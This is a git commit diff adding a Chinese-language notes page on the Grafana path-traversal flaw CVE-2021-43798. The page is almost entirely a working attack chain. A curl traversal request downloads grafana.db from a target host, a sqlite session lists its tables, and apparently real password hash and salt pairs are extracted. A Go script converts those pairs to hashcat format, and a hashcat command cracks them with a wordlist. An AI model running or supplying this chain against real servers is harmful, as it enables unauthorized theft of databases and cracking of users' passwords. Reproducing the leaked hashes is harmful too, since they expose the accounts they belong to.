update

guyupro · Apr 16, 2024 · 6820451 · 6820451
1 parent 34cb92e
commit 6820451
Show file tree

Hide file tree

Showing 2 changed files with 121 additions and 5 deletions.
diff --git a/content/Vulnerabilities/CVE-2021-43798.md b/content/Vulnerabilities/CVE-2021-43798.md
@@ -0,0 +1,120 @@
+---
+title: "CVE-2021-43798"
+draft: false
+tag: hashcat
+weight: 4
+---
+
+Grafana 8.0.0 - 8.3.0
+
+
+
+```bash
+$ curl -o grafana.db --path-as-is http://10.9.49.22:3000/public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db
+$ sqlite3 grafana.db
+SQLite version 3.31.1 2020-01-27 19:55:54
+Enter ".help" for usage hints.
+sqlite> .tables
+alert                       login_attempt            
+alert_configuration         migration_log            
+alert_instance              ngalert_configuration    
+alert_notification          org                      
+alert_notification_state    org_user                 
+alert_rule                  playlist                 
+alert_rule_tag              playlist_item            
+alert_rule_version          plugin_setting           
+annotation                  preferences              
+annotation_tag              quota                    
+api_key                     server_lock              
+cache_data                  session                  
+dashboard                   short_url                
+dashboard_acl               star                     
+dashboard_provisioning      tag                      
+dashboard_snapshot          team                     
+dashboard_tag               team_member              
+dashboard_version           temp_user                
+data_source                 test_data                
+kv_store                    user                     
+library_element             user_auth                
+library_element_connection  user_auth_token          
+```
+
+
+
+create file `passwordsalt.txt`
+
+```txt
+e21680070fb3a72d8cac29819eb74ddbee669a9d362dea5c4674d8287e4a1df22424fcdd00ab0cc8230d4249296adc2adca8|NcgfTdzwPc
+18e6160a5e7e03a7dea259195b27543c2d1b515e4490867c73ffb6214d08f77163ecc0f58321a40deb300ec563c15a327733|13CdHYK4Xl
+20ae2e2828c004ef4638f6d490a23aa9956cc4bfeb1db60abd18930f97099782037c6861518b466e20addc36dfda5f564d78|bhhVgTns9o
+```
+
+### grafana-hashcat.go
+
+create file `grafana-hashcat.go`
+
+```go
+package main
+
+import (
+	"bufio"
+	"encoding/base64"
+	"encoding/hex"
+	"fmt"
+	"os"
+	"strings"
+)
+
+func tohashes(password, salt string) string {
+	passwordBytes, err := hex.DecodeString(password)
+	if err != nil {
+		return fmt.Sprintf("Error decoding hex: %v", err)
+	}
+	passwordBase64 := base64.StdEncoding.EncodeToString(passwordBytes)
+	saltBase64 := base64.StdEncoding.EncodeToString([]byte(salt))
+	return fmt.Sprintf("sha256:10000:%s:%s", saltBase64, passwordBase64)
+}
+
+func main() {
+	file, err := os.Open("passwordsalt.txt")
+	if err != nil {
+		fmt.Println("Error opening file:", err)
+		return
+	}
+	defer file.Close()
+
+	scanner := bufio.NewScanner(file)
+	for scanner.Scan() {
+		line := scanner.Text()
+		parts := strings.Split(line, "|")
+		if len(parts) != 2 {
+			fmt.Println("Invalid line:", line)
+			continue
+		}
+		fmt.Println(tohashes(parts[0], parts[1]))
+	}
+
+	if err := scanner.Err(); err != nil {
+		fmt.Println("Error reading file:", err)
+	}
+}
+
+```
+
+**RUN**
+
+```cmd
+> go run .\grafana-hashcat.go
+sha256:10000:TmNnZlRkendQYw==:4haABw+zpy2MrCmBnrdN2+5mmp02LepcRnTYKH5KHfIkJPzdAKsMyCMNQkkpatwq3Kg=
+sha256:10000:MTNDZEhZSzRYbA==:GOYWCl5+A6feolkZWydUPC0bUV5EkIZ8c/+2IU0I93Fj7MD1gyGkDeswDsVjwVoydzM=
+sha256:10000:YmhoVmdUbnM5bw==:IK4uKCjABO9GOPbUkKI6qZVsxL/rHbYKvRiTD5cJl4IDfGhhUYtGbiCt3Dbf2l9WTXg=
+```
+
+### hashcat
+
+```cmd
+> hashcat.exe -m 10900 hashes.txt rockyou.txt -o o.txt
+```
+
+
+参考: <https://vulncheck.com/blog/grafana-cve-2021-43798>
diff --git a/content/Vulnerabilities/_index.md b/content/Vulnerabilities/_index.md
@@ -4,8 +4,4 @@ draft: false
 weight: 4
 ---
 
-## 什么是渗透测试
-
-## 从了解到发现不安全
-
-## 学习好理论
+漏洞利用